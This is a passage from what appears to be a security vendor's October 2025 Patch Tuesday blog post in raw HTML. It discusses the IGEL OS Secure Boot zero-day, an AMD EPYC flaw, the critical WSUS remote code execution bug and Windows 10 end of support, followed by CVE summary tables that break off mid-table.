patching both of these vulnerabilities today. The sting in the tail is that they’re fixing the glitch by removing the vulnerable driver altogether, so if you are still using a fax modem with an Agere chipset, no fax for you!</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IGEL OS: UEFI zero-day</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>If you don’t run thin clients targeting Windows environments, you might be unaware of the existence of IGEL OS, but today’s publication of the advisory for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47827"><span style='font-size: undefined;'>CVE-2025-47827</span></a><span style='font-size: undefined;'> — which is a zero-day vulnerability — may put it on the radar a little more widely. Successful exploitation abuses overly lax cryptographic verification of root filesystem, and allows bypass of Secure Boot. Microsoft is aware of exploitation in the wild, and is offering patches for the usual array of Windows products.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The advisory doesn’t explain what the Windows patches are protecting against when the flaw is in IGEL OS itself. However, the </span><a href="https://github.com/Zedeldi/CVE-2025-47827?tab=readme-ov-file#description"><span style='font-size: undefined;'>write-up by the original discoverer</span></a><span style='font-size: undefined;'> contains a significant amount of interesting backstory, and we can infer that the Windows patches will include additions to the UEFI revocation list, theoretically rendering a specific asset immune to this attack.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>AMD: zero-day information disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Every so often, a processor vulnerability gets some attention. When they are included in a set of Patch Tuesday vulns, processor vulnerabilities tend to march to the beat of their own drummer, since Microsoft likely has very little control over how or when these are announced. AMD published </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-0033"><span style='font-size: undefined;'>CVE-2025-0033</span></a><span style='font-size: undefined;'> yesterday, and Microsoft has responded with their own advisory today. The flaw affects only fairly recent AMD EPYC processors, which are more likely to be found in a cloud data centre than they are in a metal box underneath your desk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is technically a zero-day vulnerability, since Microsoft is acknowledging that at least some products are affected, and there’s no patch yet. Specifically, Microsoft acknowledges that patches are needed for several variants of Azure Confidential Compute VM, and that they are working towards providing those patches. There isn’t anything much to do here yet from a Windows administration perspective, since AMD’s advisory understandably addresses only the underlying hardware, and Microsoft hasn’t said anything yet about any possible impact on Windows itself.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Server Update Service: critical pre-auth RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows Server Update Service (WSUS) provides admins with some very handy features. You can download updates from Microsoft once, and then redistribute them locally. It also allows scheduling of deployments to minimize impact on business activities, as well as centralized monitoring of updates. What’s not to love, right? Answer: </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59287"><span style='font-size: undefined;'>CVE-2025-59287</span></a><span style='font-size: undefined;'>, a critical RCE which allows an attacker to execute code remotely. Although Microsoft isn’t currently claiming knowledge of disclosure or exploitation in the wild, they do consider exploitation more likely. Although the advisory doesn’t explicitly mark this one out as a pre-authentication RCE, the CVSS v3 base score of 9.8 tells an alarming story: a network attack vector, no privileges required, and low attack complexity. Patches are available for all versions of Windows Server. Taking all that into account, along with the Acknowledgements section of the advisory, a good time to apply these patches is right meow.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Today marks the end of an era, sort of. As Rapid7 has </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025/"><span style='font-size: undefined;'>previously noted</span></a><span style='font-size: undefined;'>, today marks the </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>. Of course, there’s a lot of nuance here. First, let’s address </span><a href="https://learn.microsoft.com/en-us/windows/whats-new/ltsc/overview"><span style='font-size: undefined;'>Windows 10 Long Term Support Channel (LTSC)</span></a><span style='font-size: undefined;'> installations, which are Microsoft’s way of providing risk-averse enterprise customers with the same exact OS almost indefinitely. An LTSC installation never has to worry about huge feature updates, but instead receives only security patches.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All versions of Windows 10 LTSC will continue to receive security updates for quite some time, with the exception of Windows 10 Enterprise LTSC 2015, which is now too old even for Microsoft to support. Still, that’s been an extra eight-and-a-half years of security updates vs. the equivalent non-LTSC version of Windows 10. When you’re relying on Windows 10 for the safe operation of an MRI scanner or a critical industrial control system at a steel plant, stability is key. A frank discussion of whether or not Windows is the optimal choice in these scenarios is beyond the scope of this analysis. Regular LTSC runs until 2027, whereas IoT Enterprise LTSC 2021 is scheduled to limp onwards all the way until January 2032.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s likely that Microsoft’s Extended Security Update (ESU) offering will be much more widely discussed in the coming weeks than is typical. Via the ESU program, Microsoft offers further security updates for software which has moved past the end of support. It is generally a paid “cash for updates” service, although consumers in the European Union can take advantage of Microsoft’s offer of one free year of ESU for Windows 10 Home or Professional. It may well be a coincidence that Microsoft has extended this generous offer only to consumers in a large jurisdiction with strong consumer rights. Users without spare cash or an EU home address can consider syncing their PC settings to OneDrive — make sure to enable multi-factor authentication on your Microsoft account if you do this — or spending 1000 Microsoft Rewards points, if you know what those are and have some to spare.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft, of course, has been pushing us all to upgrade to Windows 11 for a long time, but this leaves some people out in the cold. Windows 10 users without the cash to upgrade to Windows 11-compatible PC hardware or the IT situational awareness to realize that they are now at increased risk of compromise will now drift further and further away from a solid security stance. Not for the first time, the most vulnerable users with the fewest resources will end up in the most precarious situation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Also receiving their final guaranteed patches today: </span><a href="https://support.microsoft.com/en-us/office/end-of-support-for-office-2016-and-office-2019-818c68bc-d5e5-47e5-b52f-ddf636cf8e16"><span style='font-size: undefined;'>Office 2016 and Office 2019</span></a><span style='font-size: undefined;'>. Another significant change: both </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/exchange-server-2016"><span style='font-size: undefined;'>Exchange 2016</span></a><span style='font-size: undefined;'> and </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/exchange-server-2019"><span style='font-size: undefined;'>Exchange 2019</span></a><span style='font-size: undefined;'> are now entirely replaced by Exchange Server Subscription Edition. A huge amount of lifecycle change today, and one which Microsoft has been building towards for many years now. The full impact may not become clear for a while, especially the retirement of Windows 10.</span></p><h2>Summary charts</h2><h2></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ca005f085205072/68eec3ea8f8c1e67409976e1/2025-10-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ca005f085205072/68eec3ea8f8c1e67409976e1/2025-10-vuln_count_component.png" data-sys-asset-uid="blt2ca005f085205072" data-sys-asset-filename="2025-10-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbb16023fb56d4b66/68eec3eabf9ee90885904bbb/2025-10-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbb16023fb56d4b66/68eec3eabf9ee90885904bbb/2025-10-vuln_count_impact.png" data-sys-asset-uid="bltbb16023fb56d4b66" data-sys-asset-filename="2025-10-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda047a3a85807577/68eec3ea7340059e30f77cac/2025-10-vuln_count_impact-component-heatmap.png" alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda047a3a85807577/68eec3ea7340059e30f77cac/2025-10-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltda047a3a85807577" data-sys-asset-filename="2025-10-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2 style="direction: ltr;">Summary tables</h2><h3 style="direction: ltr;"><strong>Apps vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.461538461538462%"/><col style="width:39.743589743589745%"/><col style="width:13.782051282051283%"/><col style="width:16.98717948717949%"/><col style="width:16.025641025641026%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59489"><span style='font-size: undefined;'>CVE-2025-59489</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE: CVE-2025-59489 Unity Gaming Engine Editor vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59281"><span style='font-size: undefined;'>CVE-2025-59281</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Xbox Gaming Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59252"><span style='font-size: undefined;'>CVE-2025-59252</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>M365 Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59272"><span style='font-size: undefined;'>CVE-2025-59272</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59286"><span style='font-size: undefined;'>CVE-2025-59286</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Azure vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:12.5%"/><col style="width:42.46794871794872%"/><col style="width:13.782051282051283%"/><col style="width:16.185897435897438%"/><col style="width:15.064102564102564%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59246"><span style='font-size: undefined;'>CVE-2025-59246</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Entra ID Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59218"><span style='font-size: undefined;'>CVE-2025-59218</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Entra ID Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59247"><span style='font-size: undefined;'>CVE-2025-59247</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure PlayFab Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59271"><span style='font-size: undefined;'>CVE-2025-59271</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis Enterprise Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55321"><span style='font-size: undefined;'>CVE-2025-55321</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Log Analytics Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59291"><span style='font-size: undefined;'>CVE-2025-59291</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Confidential Azure Container Instances Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59292"><span style='font-size: undefined;'>CVE-2025-59292</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Compute Gallery Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-0033"><span style='font-size: undefined;'>CVE-2025-0033</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>AMD CVE-2025-0033: RMP Corruption During SNP Initialization</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59494"><span style='font-size: undefined;'>CVE-2025-59494</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58724"><span style='font-size: undefined;'>CVE-2025-58724</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Arc Enabled Servers - Azure Connected Machine Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59285"><span style='font-size: undefined;'>CVE-2025-59285</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47989"><span style='font-size: undefined;'>CVE-2025-47989</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Connected Machine Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Browser vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.001605136436597%"/><col style="width:40.93097913322632%"/><col style="width:13.804173354735152%"/><col style="width:16.693418940609952%"/><col style="width:15.569823434991974%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11460"><span style='font-size: undefined;'>CVE-2025-11460</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11460 Use after free in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11458"><span style='font-size: undefined;'>CVE-2025-11458</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11458 Heap buffer overflow in Sync</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11219"><span style='font-size: undefined;'>CVE-2025-11219</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11219 Use after free in V8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11216"><span style='font-size: undefined;'>CVE-2025-11216</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11216 Inappropriate implementation in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11215"><span style='font-size: undefined;'>CVE-2025-11215</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11215 Off by one error in V8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11213"><span style='font-size: undefined;'>CVE-2025-11213</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11213 Inappropriate implementation in Omnibox</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11212"><span style='font-size: undefined;'>CVE-2025-11212</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11212 Inappropriate implementation in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11211"><span style='font-size: undefined;'>CVE-2025-11211</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11211 Out of bounds read in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11210"><span style='font-size: undefined;'>CVE-2025-11210</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11210 Side-channel information leakage in Tab</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11209"><span style='font-size: undefined;'>CVE-2025-11209</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11209 Inappropriate implementation in Omnibox</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11208"><span style='font-size: undefined;'>CVE-2025-11208</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11208 Inappropriate implementation in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11207"><span style='font-size: undefined;'>CVE-2025-11207</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11207 Side-channel information leakage in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11206"><span style='font-size: undefined;'>CVE-2025-11206</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11206 Heap buffer overflow in Video</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-11205"><span style='font-size: undefined;'>CVE-2025-11205</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11205 Heap buffer overflow in WebGPU</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Developer Tools vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:12.980769230769232%"/><col style="width:41.02564102564102%"/><col style="width:13.782051282051283%"/><col style="width:16.666666666666668%"/><col style="width:15.544871794871796%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315"><span style='font-size: undefined;'>CVE-2025-55315</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ASP.NET Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55240"><span style='font-size: undefined;'>CVE-2025-55240</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Visual Studio Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55247"><span style='font-size: undefined;'>CVE-2025-55247</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>.NET Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: 